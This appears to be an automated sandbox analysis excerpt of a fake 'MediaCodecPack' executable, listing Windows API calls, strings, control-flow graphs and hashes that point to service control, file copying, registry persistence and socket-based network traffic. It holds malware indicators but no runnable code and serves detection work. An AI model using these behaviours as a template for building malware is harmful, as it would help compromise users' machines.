                                                                                        • Instruction Fuzzy Hash: 13219C755006049FDB28CF68D8447AABBF4FF48724F108989E8199B341DB75E945CBE0

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 693 402149-40214c 694 4021bd-4021c3 693->694 695 40214d-40214e 693->695 694->693 698 4021c5-4021c6 694->698 696 402150-402163 695->696 697 402139-402140 695->697 701 40e040 696->701 699 402142-402147 697->699 700 402109-40210b 697->700 702 4021d5-4021da 698->702 703 4021c8-4021d4 698->703 699->693 700->697 709 40e043 701->709 704 402171-40d643 702->704 705 4021dc-4021de 702->705 703->702 710 40d955-40e095 OpenSCManagerA 704->710 707 4021e0-40d9f1 705->707 708 402223 CopyFileA 705->708 707->701 712 402229-40222d 708->712 709->709 716 40e09b 710->716 717 4021ed-4021f9 710->717 712->710 718 40e09c 716->718 717->712 718->718
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: KCU:$h "H
                                                                                        • API String ID: 0-3841667563
                                                                                        • Opcode ID: 70e05740465bff6623fe55717a1e0cb7cab08e4fdb1563974d3bfdd56af563f9
                                                                                        • Instruction ID: 63b4f081242afd7d5de53f06e14c51bfbfcc0f1bc0993d0d4b68f313483703d4
                                                                                        • Opcode Fuzzy Hash: 70e05740465bff6623fe55717a1e0cb7cab08e4fdb1563974d3bfdd56af563f9
                                                                                        • Instruction Fuzzy Hash: 25112971848212DFD3124F909B592A677B1EB12300F24543B8582AB2D2C2BD4A4BD78F

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 719 b0615e-b06161 720 b06163-b06174 719->720 721 b060f5-b06139 Sleep RtlEnterCriticalSection RtlLeaveCriticalSection 719->721 723 b0613d-b06149 720->723 721->723 723->719
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(0000EA60), ref: 00B06104
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B0610F
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B06120
                                                                                        Strings
                                                                                        • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 00B06129
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeaveSleep
                                                                                        • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                        • API String ID: 1566154052-1923541051
                                                                                        • Opcode ID: fe71bbfb5f81ac9c03b51faf94c49072c4f602995046d41caee8f376e575a60e
                                                                                        • Instruction ID: 33ba337c7e1505136c4a6dd664a157dfb9af8a7c7804eea49102fd2b925fd689
                                                                                        • Opcode Fuzzy Hash: fe71bbfb5f81ac9c03b51faf94c49072c4f602995046d41caee8f376e575a60e
                                                                                        • Instruction Fuzzy Hash: 8BF0F63254C3C08FC7138770AC989A53FF0BF5B314B1A00D7E585AF4A3C6A92809C7A2
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32 ref: 00402A46
                                                                                          • Part of subcall function 00403B64: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                          • Part of subcall function 00403B64: HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                        • GetCommandLineA.KERNEL32 ref: 00402A94
                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 00402ABF
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402AE2
                                                                                          • Part of subcall function 00402B3B: ExitProcess.KERNEL32 ref: 00402B58
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2057626494-0
                                                                                        • Opcode ID: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                        • Instruction ID: 5f87248e4510ca7a7a053da507506fe2897125482441b09741c869e2758f94b2
                                                                                        • Opcode Fuzzy Hash: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                        • Instruction Fuzzy Hash: BA214CB19006159ADB04AFA6DE49A6E7FA8EB04715F10413FF905BB2D1DB384900CA6C
                                                                                        APIs
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00B02EEE
                                                                                        • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00B02EFD
                                                                                        • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00B02F0C
                                                                                        • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 00B02F36
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$Socketsetsockopt
                                                                                        • String ID:
                                                                                        • API String ID: 2093263913-0
                                                                                        • Opcode ID: 50bddb6fc95b42f5af1d3fcd669252ef1ee4a88859b0bdd58ad7ccd0e7d9cf24
                                                                                        • Instruction ID: 4231981bf5d2ceb33da868d1cc46697a19d9c7d77449f879a0d3394d19ca7c16
                                                                                        • Opcode Fuzzy Hash: 50bddb6fc95b42f5af1d3fcd669252ef1ee4a88859b0bdd58ad7ccd0e7d9cf24
                                                                                        • Instruction Fuzzy Hash: 51014471601305BBDB309F65DC89B9BBFB9EB85772F0085A5F918DB191DA708D018BA0
                                                                                        APIs
                                                                                          • Part of subcall function 00B02D39: WSASetLastError.WS2_32(00000000), ref: 00B02D47
                                                                                          • Part of subcall function 00B02D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 00B02D5C
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00B02E6D
                                                                                        • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 00B02E83
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$Sendselect
                                                                                        • String ID: 3'
                                                                                        • API String ID: 2958345159-280543908
                                                                                        • Opcode ID: c5dcc7e64bf01f6c1c12d865f3fcf9cf454156a98d1ad7a0517bd71bdc35c78a
                                                                                        • Instruction ID: f6156be87d6d863319d11e45fd2e11f65510afd25e0456f697a747b44a47ad79
                                                                                        • Opcode Fuzzy Hash: c5dcc7e64bf01f6c1c12d865f3fcf9cf454156a98d1ad7a0517bd71bdc35c78a
                                                                                        • Instruction Fuzzy Hash: 7931C2B0A002099FDF10EF64D8597EEBFE9EF04354F0046EAE804972C1E77199498BA0
                                                                                        APIs
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00B02AEA
                                                                                        • connect.WS2_32(?,?,?), ref: 00B02AF5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLastconnect
                                                                                        • String ID: 3'
                                                                                        • API String ID: 374722065-280543908
                                                                                        • Opcode ID: 0a899517f68e4c05aa5b6a5918a7026b845a5a1d85ded342582efd079a84e4c2
                                                                                        • Instruction ID: 459d049f44d509f18211d0ce02546d8a0f6781da6949c3e715468eb1699addd0
                                                                                        • Opcode Fuzzy Hash: 0a899517f68e4c05aa5b6a5918a7026b845a5a1d85ded342582efd079a84e4c2
                                                                                        • Instruction Fuzzy Hash: C221C674E00205ABCF24FFA4D8196BEBFF9EF44324F1081D9E818972C1EB744A068B91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: a1bea7adcc9b66ce5e083fc23fe0f7cffbb28743eac70f60794ff164be4b270e
                                                                                        • Instruction ID: 7605f73ff76e3f315e09767aae03ff3950b25f2c3fc6d885eb85bdea98191c69
                                                                                        • Opcode Fuzzy Hash: a1bea7adcc9b66ce5e083fc23fe0f7cffbb28743eac70f60794ff164be4b270e
                                                                                        • Instruction Fuzzy Hash: 26514CB1904216DFCB18DF68D8556AABFF4FF08720F10819EE8299B391D7759A11CFA0
                                                                                        APIs
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, xrefs: 0040D655
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpi
                                                                                        • String ID: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                        • API String ID: 1586166983-2037762836
                                                                                        • Opcode ID: 17134def4ae493ed892da5cf1e4e02e31044a7d05c58cb64cc9be4b1d3063305
                                                                                        • Instruction ID: 16557cb42895348a952eaf9991b4a66d97034997999308634aca6265cd08f949
                                                                                        • Opcode Fuzzy Hash: 17134def4ae493ed892da5cf1e4e02e31044a7d05c58cb64cc9be4b1d3063305
                                                                                        • Instruction Fuzzy Hash: E321BB326041618FC7219B69D985BE5BBB0EF0131076844BBE086F71E2D339D907DB8A
                                                                                        APIs
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00B036A7
                                                                                          • Part of subcall function 00B02420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00B02432
                                                                                          • Part of subcall function 00B02420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00B02445
                                                                                          • Part of subcall function 00B02420: RtlEnterCriticalSection.NTDLL(?), ref: 00B02454
                                                                                          • Part of subcall function 00B02420: InterlockedExchange.KERNEL32(?,00000001), ref: 00B02469
                                                                                          • Part of subcall function 00B02420: RtlLeaveCriticalSection.NTDLL(?), ref: 00B02470
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                        • String ID:
                                                                                        • API String ID: 1601054111-0
                                                                                        • Opcode ID: 012673d7bda3e0fe69dbd67867dc2c7beb56c8e76d56e6fa856662d83d0a44cb
                                                                                        • Instruction ID: f3cf284571c1b0a3f123f2c178a85c61ff8539f66e97f864e0a3ef96f94c43e7
                                                                                        • Opcode Fuzzy Hash: 012673d7bda3e0fe69dbd67867dc2c7beb56c8e76d56e6fa856662d83d0a44cb
                                                                                        • Instruction Fuzzy Hash: 1B11C1F5204208ABDB218F14CC89FAA3FE9EF04B50F204456FE56DA2D0CB74DE609B94
                                                                                        APIs
                                                                                        • __beginthreadex.LIBCMT ref: 00B11116
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000002,00B0998D,00000000), ref: 00B11147
                                                                                        • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,00B0998D,00000000), ref: 00B11155
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandleResumeThread__beginthreadex
                                                                                        • String ID:
                                                                                        • API String ID: 1685284544-0
                                                                                        • Opcode ID: 42bd27dd490b704f98c4e4d513ab473321c41fd2f69f10b208aec1a742540d0a
                                                                                        • Instruction ID: dafc5e35d06dc401389fdb1958cd6f859b4fda63e84cf1421fd97e7a4fd6bd46
                                                                                        • Opcode Fuzzy Hash: 42bd27dd490b704f98c4e4d513ab473321c41fd2f69f10b208aec1a742540d0a
                                                                                        • Instruction Fuzzy Hash: 52F06871200200ABDB209F5CDC81FD5B3E8EF59725F64099AF754E7290D771ACE29A90
                                                                                        APIs
                                                                                        • InterlockedIncrement.KERNEL32(00B3529C), ref: 00B01ABA
                                                                                        • WSAStartup.WS2_32(00000002,00000000), ref: 00B01ACB
                                                                                        • InterlockedExchange.KERNEL32(00B352A0,00000000), ref: 00B01AD7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Interlocked$ExchangeIncrementStartup
                                                                                        • String ID:
                                                                                        • API String ID: 1856147945-0
                                                                                        • Opcode ID: ceea8f66790d580d557ac4bd0ec78cdbf2bc5d9de8935f55a3360a911c2eb432
                                                                                        • Instruction ID: 115af4c0231289d2d4e16689397397343a2d0da62d4dcaa9dc2b84d0d31bb890
                                                                                        • Opcode Fuzzy Hash: ceea8f66790d580d557ac4bd0ec78cdbf2bc5d9de8935f55a3360a911c2eb432
                                                                                        • Instruction Fuzzy Hash: A1D05E31944A085BD23067A4AD0FA7A7BACD706712F500691FD65C61E0EE61692085A7
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B38000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B38000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b38000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: InternetOpen
                                                                                        • String ID: U[6
                                                                                        • API String ID: 2038078732-2089642770
                                                                                        • Opcode ID: b2956d3dd9b0e15e94d071e54ae06227d6ce3089cc0f04671975aae9c41fc50b
                                                                                        • Instruction ID: e79f0d8eca733b0defede186f096dda241d3ab8f82af463b940dbb2a4305f826
                                                                                        • Opcode Fuzzy Hash: b2956d3dd9b0e15e94d071e54ae06227d6ce3089cc0f04671975aae9c41fc50b
                                                                                        • Instruction Fuzzy Hash: 65515EB260C600AFE7156F19ECC5BBAFBE9EF98320F06092DE7D583700D63558508A97
                                                                                        APIs
                                                                                        • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D955
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ManagerOpen
                                                                                        • String ID: \
                                                                                        • API String ID: 1889721586-2967466578
                                                                                        • Opcode ID: 47e18badabb9a11a3572604af3e4cd9f8c383518db4218f6d02ffe5002e8c993
                                                                                        • Instruction ID: 8e8821c1328745804740ee922d0e0ad68cd22f4e5c91e5f54ebb7d82a2aacae8
                                                                                        • Opcode Fuzzy Hash: 47e18badabb9a11a3572604af3e4cd9f8c383518db4218f6d02ffe5002e8c993
                                                                                        • Instruction Fuzzy Hash: 1CF0B170808305DFD7545F909F595EE76649B00704F30187BD252B51D1C67D0D86EB1E
                                                                                        APIs
                                                                                        • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D955
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ManagerOpen
                                                                                        • String ID: \
                                                                                        • API String ID: 1889721586-2967466578
                                                                                        • Opcode ID: 17e45ab395ead0f62f396e7f1f242be3a45938007961b54f1ffbde5d339a0c73
                                                                                        • Instruction ID: dfed284e86085894593c89054d3589a99278d46d110c027cd813ee3a9ff9004b
                                                                                        • Opcode Fuzzy Hash: 17e45ab395ead0f62f396e7f1f242be3a45938007961b54f1ffbde5d339a0c73
                                                                                        • Instruction Fuzzy Hash: 2EE08670404149FEDB244A985F5DBEA25E85700384F3404F79685B50D1C1780E49AA6B
                                                                                        APIs
                                                                                        • RegSetValueExA.KERNELBASE(?,media_codec_pack_i54,00000000,00000004), ref: 0040D0C4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value
                                                                                        • String ID: media_codec_pack_i54
                                                                                        • API String ID: 3702945584-2191737078
                                                                                        • Opcode ID: fedf09dc2174d101d172c4c0bb91e200648cc66d24cdd27f8ba12e2e2e5e7dc2
                                                                                        • Instruction ID: 2460327dcc54fba3be2b988abc8dcdb9b1e9a0a8134423c7c4e4248cbea0685f
                                                                                        • Opcode Fuzzy Hash: fedf09dc2174d101d172c4c0bb91e200648cc66d24cdd27f8ba12e2e2e5e7dc2
                                                                                        • Instruction Fuzzy Hash: 37C08C30A88200EFEA210B404F09FA43634A708705F3140E2B346340E082B90EA2AE0E
                                                                                        APIs
                                                                                        • RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 0040DD69
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID: Common AppData
                                                                                        • API String ID: 3660427363-2574214464
                                                                                        • Opcode ID: ab263f3a602ed345e702ad74f32ed8129ad5b37c684106ce94200781c9ebff29
                                                                                        • Instruction ID: 7de116b4efb22206a60a49d6e64df041c4b05bd6381c1080f431fe0b0fcf661a
                                                                                        • Opcode Fuzzy Hash: ab263f3a602ed345e702ad74f32ed8129ad5b37c684106ce94200781c9ebff29
                                                                                        • Instruction Fuzzy Hash: 39C04C70908105EADB114FA08E44E7E7678BE40740B21457B9053710D0D7789906B65B
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00B04BF2
                                                                                          • Part of subcall function 00B01BA7: __EH_prolog.LIBCMT ref: 00B01BAC
                                                                                          • Part of subcall function 00B01BA7: RtlEnterCriticalSection.NTDLL ref: 00B01BBC
                                                                                          • Part of subcall function 00B01BA7: RtlLeaveCriticalSection.NTDLL ref: 00B01BEA
                                                                                          • Part of subcall function 00B01BA7: RtlEnterCriticalSection.NTDLL ref: 00B01C13
                                                                                          • Part of subcall function 00B01BA7: RtlLeaveCriticalSection.NTDLL ref: 00B01C56
                                                                                          • Part of subcall function 00B0D0FC: __EH_prolog.LIBCMT ref: 00B0D101
                                                                                          • Part of subcall function 00B0D0FC: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00B0D180
                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00B04CF2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                        • String ID:
                                                                                        • API String ID: 1927618982-0
                                                                                        • Opcode ID: 5579a8c7bfd4a545c5dbecd8a2c5d292be1b3bc48fb5e2cb8b292b8eba956525
                                                                                        • Instruction ID: 0c50c462e94405225d4437b2d8799e68402e9d381a390252fdb7089b7257f67e
                                                                                        • Opcode Fuzzy Hash: 5579a8c7bfd4a545c5dbecd8a2c5d292be1b3bc48fb5e2cb8b292b8eba956525
                                                                                        • Instruction Fuzzy Hash: 2C510BB1D04248DFDB15DFA8C495AEEBFF4EF18310F1481AAE905AB392DB719A44CB50
                                                                                        APIs
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00B02D47
                                                                                        • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 00B02D5C
                                                                                          • Part of subcall function 00B0950D: WSAGetLastError.WS2_32(00000000,?,?,00B02A51), ref: 00B0951B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$Send
                                                                                        • String ID:
                                                                                        • API String ID: 1282938840-0
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
  • Part of subcall function 00403A1C: GetVersionExA.KERNEL32 ref: 00403A3B
• HeapDestroy.KERNEL32 ref: 00403BB4
  • Part of subcall function 00403F3B: HeapAlloc.KERNEL32(00000000,00000140,00403B9D,000003F8), ref: 00403F48
Memory Dump Source
• Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
Similarity
• API ID: Heap$AllocCreateDestroyVersion
• String ID:
• API String ID: 2507506473-0
APIs
• lstrcmpiW.KERNELBASE(?), ref: 0040230F
• lstrcmpiW.KERNEL32(?,00409174), ref: 0040D7CD
Strings
• C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, xrefs: 0040D655
Memory Dump Source
• Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
Similarity
• API ID: lstrcmpi
• String ID: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
• API String ID: 1586166983-2037762836
APIs
• __EH_prolog.LIBCMT ref: 00B0511E
  • Part of subcall function 00B03D7E: htons.WS2_32(?), ref: 00B03DA2
  • Part of subcall function 00B03D7E: htonl.WS2_32(00000000), ref: 00B03DB9
  • Part of subcall function 00B03D7E: htonl.WS2_32(00000000), ref: 00B03DC0
Memory Dump Source
• Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: htonl$H_prologhtons
• String ID:
• API String ID: 4039807196-0
APIs
• __EH_prolog.LIBCMT ref: 00B0D9CA
  • Part of subcall function 00B01A01: TlsGetValue.KERNEL32 ref: 00B01A0A
Memory Dump Source
• Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: H_prologValue
• String ID:
• API String ID: 3700342317-0
APIs
• __EH_prolog.LIBCMT ref: 00B0D55A
  • Part of subcall function 00B026DB: RtlEnterCriticalSection.NTDLL(?), ref: 00B02706
  • Part of subcall function 00B026DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 00B0272B
  • Part of subcall function 00B026DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B23173), ref: 00B02738
  • Part of subcall function 00B026DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 00B02778
  • Part of subcall function 00B026DB: RtlLeaveCriticalSection.NTDLL(?), ref: 00B027D9
Memory Dump Source
• Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
• String ID:
• API String ID: 4293676635-0
APIs
• RegCreateKeyExA.KERNELBASE ref: 00402067
Memory Dump Source
• Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
APIs
• __EH_prolog.LIBCMT ref: 00B0D339
  • Part of subcall function 00B127C5: _malloc.LIBCMT ref: 00B127DD
  • Part of subcall function 00B0D555: __EH_prolog.LIBCMT ref: 00B0D55A
Memory Dump Source
• Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: H_prolog$_malloc
• String ID:
• API String ID: 4254904621-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
APIs
  • Part of subcall function 00B148CA: __getptd_noexit.LIBCMT ref: 00B148CB
  • Part of subcall function 00B148CA: __amsg_exit.LIBCMT ref: 00B148D8
  • Part of subcall function 00B124A3: __getptd_noexit.LIBCMT ref: 00B124A7
  • Part of subcall function 00B124A3: __freeptd.LIBCMT ref: 00B124C1
  • Part of subcall function 00B124A3: RtlExitUserThread.NTDLL(?,00000000,?,00B12483,00000000), ref: 00B124CA
• __XcptFilter.LIBCMT ref: 00B1248F
  • Part of subcall function 00B17954: __getptd_noexit.LIBCMT ref: 00B17958
Memory Dump Source
• Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
• String ID:
• API String ID: 1405322794-0
APIs
Memory Dump Source
